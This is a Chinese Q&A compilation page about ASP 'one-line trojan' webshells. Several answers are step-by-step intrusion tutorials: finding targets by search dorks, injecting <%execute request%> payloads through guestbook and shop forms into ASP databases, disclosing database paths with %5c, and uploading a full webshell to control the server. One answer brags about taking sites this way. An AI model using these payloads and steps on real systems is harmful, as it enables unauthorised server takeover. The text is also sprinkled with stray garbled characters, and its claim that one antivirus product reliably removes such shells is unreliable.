导航:首页 > 编程大全 > 数据库一句话木马

数据库一句话木马

发布时间:2023-03-26 18:59:35

A. 一句话木马的使用方法

首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式燃亏吵,把皮侍一句话添加到asp数据库,或者加进asp网页.
记住!我们的目的是把一句话<%execute request(value)%>添加到数据库,无论任空孙何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。

B. mysql数据库中能插一句话木马嘛

insert into 表名 values('木马')

C. 什么是一句话木马

一句话木马的使用

实例一:“一句话木马”入侵“EASYNEWS新闻管理系统

“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。

Step1 搜索入侵目标

使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“www.****.COM 版权所有”。只要在GOOGLE或网络中以该字符串为关键词进行搜索,就可以找到大量的入侵目标。

Step2 检测入侵条件

在这里,我们以网站“http://www.****.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”,首先在浏览器地址栏中输入“http://www.****.com/news/ebook/db/ebook.asp”,回车后在浏览亏拍世器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码,则说明该网站的留言本数据库文件没有改名,可以进行入侵。

Step3 在数据库中插入ASP后门

前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码

在浏览器中访问“http://www.****.com/news/khly.htm”,打开提交留言页面。在提交页面中的“主页”栏中,直接填写“一句话木销肢马”服务端代码,其它随便填写。确定后点击“发表留言”按钮,文章发表成功后,即可将“一句话木马”服务端代码插入到留言本数据库中了。

Step4 连接后门上传Webshell

由于留言本数据库文件“ebook.asp”是一个ASP文件,所以我们插入到数据库文件中的ASP语句将会被执行。将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手ASP代码。点击提交按钮后,刚才粘贴的ASP木马将被写入到论坛服务器中保存。

Step5 打开WEBSHELL

上传的ASP木马被保存到与数据库文件同一WEB目录下,文件名为“temp.asp”,因此我们在IE浏览器中打开页面“http://www.****.com/news/ebook/db/temp.asp”,输入默认的密码“gxgl.com”,就可以看到一个WEBSHELL了。

在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了。

实例二 “社区超市”入侵动网论坛

Step1 检测入侵条件

以入侵论坛“http://www.****.com/”为例。首先在浏览器地址栏中输入“http://www.****.com/data/shop.asp”,回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息。说明该论坛的社区超市数据库文件没有改名或删除,可以进行入侵。

Step2 在数据库中插入ASP后门

登录论坛后,点击页面中的“娱乐”→“社区超市”,打开社区超市页面。在该页面中选择商店申请,打开“商店申请入驻”页面“http://www.****.com/z_shop_newshop.asp”,在页面中填写任意信息,注意在“商店招牌”栏中,添加刚才的ASP代码"〈%execute request("l")%〉"。确定后点击“申请”按钮进行提交,即可将ASP代码保存在数据库文件中了。

后面的步骤就与上面介绍的一样了,只需要用蓝屏木马连接数据库文件“http://sdoygb.w2.****.net/data/shop.asp”,然后上传WEBSHELL就可以控制论贺搭坛服务器了。

实例三 “一句话木马”入侵未知网站

从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址。对于一些使用了未知网页程序的网站,我们如何才能找到它的数据库地址呢?这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法。

Step1 暴库得到数据库路径

以“http://bbs.****.com”为例。在浏览器中打开“http://bbs.****.com/join/listall.asp?bid=2”,将地址栏中join后的/改为%5c,在提交后的返回返回信息中可以看到网站数据库地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,数据库文件名中加入了“#”符号,“#”符号在IE中执行时被解释为中断符,要访问该数据库文件则必须将“#”号变为“23%”才可以。因此数据库文件的实际WEB地址为“http://bbs.****.com/join/admin/adshuilonG!%23).asp”

Step2 注册网站,插入“一句话木马”

由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去。

在网页上点击注册网站按钮,打开注册链接“http://bbs.****.com/join/add.asp过滤了=step3&bid=3”,在资料填写页面处的站点名称或地址中写入“一句话木马”服务端代码,其它随便填写。然后点击完成按钮提交数据,木马服务端就被插入到数据库文件中了。

最后只需要用蓝屏木马连接数据库文件“http://bbs.****.com/join/admin/adshuilonG!%23).asp”,然后上传ASP木马就可以控制该网站的服务器了。

“一句话木马”的防范

要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了。

其次就是要防止用户提交的数据未过滤漏洞,对用户提交的数据进行过滤,替换一些危险的代码等。例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补,插入的ASP代码中的〈、〉和"等字符会被网页程序转换成其它字符,致使服务端代码无法正常执行。

只要作好这两方面的安全工作,“一句话木马”虽然无孔不入,但是面对这样的网站系统也是无可奈何的了。

D. 数据库 mssql 已经插入一句话木马,怎么使用一句话传木马在线等。

一句话木马的作用就是为了方便上传大马,直接上传你的WEBSHELL

E. 一句话木马的乱码是怎么得到的

这个其实还是利用的字符转换,最早的时候禅尘是卖键直接输入特殊字符的,后来各大数据库都开始过滤他们了,就想到了这种方式
这个木马其实没啥可怕的,只要在服务器上面安装一个腾讯电脑管家
就贺配禅可以完美查杀的

F. 一句话木马饶过过滤

不能绕过过滤的,因为这个技术是很老很老的技术了,我印象中这个一租唯句话木马在六七年前就有了
现在的数据库都已经过滤特殊字符了,所以这类的现在已经失效
退一步讲,就算能过去,这么简单的木马代码,也逃不过安软的查杀的
只要对方的服务器上面安装有腾讯电脑管家这类的云安软,你轿型滚的木闭余马没有存活的可能性的

G. 一句话木马怎么插和我插了一句话木马之后那个打开网址然后上传代码的网址是多少那些教程里没有说那个地址

一句话木马插入方法:第一种:先判断数据库是asp或其他格式,若为asp格式,可通过留言本向数据库插入一句话代码,插入后,用中国菜刀连接留言本数据库地址(数据库地址可以通过暴库爆出路径,暴不出路径,就用工具强行扫描,看是否能扫到数据库地址)就得到webshell了。第二种:进入网站后台,然后修改网站名,把网站名修改成一句话木马代码,记住,要闭合插入一句话,即

js">"%><%eval简圆扰request("这里换成你喜欢设的密码"%><%s="'闭合的一句话木马代码
<%evalrequest("这里换成你喜欢设的密码"%>'未闭合的一句话木马代码

有一次,我进了一个网站后台,修改网站名时,没有闭合插入一句话木马代码,致使后台出现了403错误,无法打开,白浪费了一个网站。闭合插入并保存后,用中国菜刀连接网站配置文件(配置文件路径可以通过插入未闭合的一句话木马代码,不保存,点击后台别的位置,会出现错误提示,下面的路径就是网站配置文件的路径),因为网站拦旦名等信息在网站的配置文件中,就要连接配置文件,成功后,你就得到了网站webshell了。

总之,我是这样拿站的,希望这些方法对你腔冲有用。

H. 一句话木马中的大马和小马的作用各是什么

小马体积衡裂小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能。
不过中国菜刀留的一句话功能不逊大马的功能。

大马体积比较大 一般50K以上。功能也多,咐耐闭一般都包括提权命令,磁盘管理,数据库连接借口,执行命令甚至有些以具备自带提权功能和压缩,解压缩网站程序亩毁的功能。这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序。

I. 超高分求 asp一句话木马~

不知道你要的是不是这个
帖子名是一句话木马精装易用增强版本
http://bbs.hackbase.com/viewthread.php?tid=2780351&highlight=%D2%BB%BE%E4%BB%B0%2B%C4%BE%C2%ED

阅读全文

与数据库一句话木马相关的资料

热点内容
数据删除怎么表示 浏览:672
苹果用什么清理缓存文件 浏览:248
数据科学之路是什么 浏览:857
哪个app贷款好 浏览:826
iphone支持桥接吗 浏览:16
dnf85版本首饰熟练度还有用么 浏览:201
commonconfigcfg配置文件 浏览:973
如何将wps文件拉入苹果手机里面 浏览:456
高中学什么编程 浏览:342
迷你编程如何切换角色 浏览:737
魔术工具怎样做 浏览:972
IDEA文件夹哪个是安装包 浏览:864
wav格式的文件 浏览:489
iphone4s支持的视频分辨率 浏览:123
wps图表链接文件不可用 浏览:426
官方网购节什么网站 浏览:635
数控车床倒角30度如何编程 浏览:806
预算执行数据怎么来的 浏览:614
java文件同步服务器 浏览:1000
截图保存为哪个文件夹 浏览:101

友情链接